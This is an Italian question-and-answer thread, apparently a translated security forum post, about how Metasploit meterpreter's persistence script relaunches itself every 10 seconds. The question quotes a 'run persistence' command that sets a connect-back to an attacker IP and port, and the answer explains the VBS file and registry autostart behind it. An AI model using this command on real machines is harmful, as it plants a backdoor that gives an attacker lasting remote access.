Come funziona la persistenza di metasploit?

3

Quando eseguiamo il remote exploit di un target con meterpreter, possiamo usare il comando run persistence -U -i 10 -p 12345 -r 192.168.1.1 per creare un programma persistente che proverà a connettersi alla macchina quale indirizzo IP è 192.168.1.1 sulla porta 12345 ogni 10 secondi.

Quando ho usato il monitor dell'attività sul computer di destinazione, ho visto che il programma persistente si esegue in realtà ogni 10 secondi cercando di connettersi alla macchina attaccante e, se non viene trovata alcuna risposta, il programma si spegne da solo.

Quello che voglio sapere è: come fa questo programma (o script) a lanciarsi ogni 10 secondi (so che non sta usando sleep () o un thread perché nessun altro nuovo processo viene mostrato nel monitor dell'attività).

Ho cercato nel registro di Windows e ho appena scoperto che questo script si avvia automaticamente all'avvio, ma non capisco come si lanci periodicamente.

    
posta Sidahmed 03.04.2016 - 16:41
fonte

1 risposta

2

Dal codice sorgente dello script di persistenza meterpreter, il Il parametro delay viene passato all'eseguibile VBS che viene creato.

Quando controlli il codice di creazione VBS , tu può vedere che esegue WScript.Sleep

Quando dici che la persistenza non ha eseguito sleep() , presumo tu voglia dire che non sta eseguendo quella funzione nella shell, e non lo è. Ma è che esegue la funzione simile nell'eseguibile VBS.

Ricordati di controllare sempre il codice sorgente. Le risposte sono sempre lì.

    
risposta data 03.04.2016 - 17:58
fonte

Leggi altre domande sui tag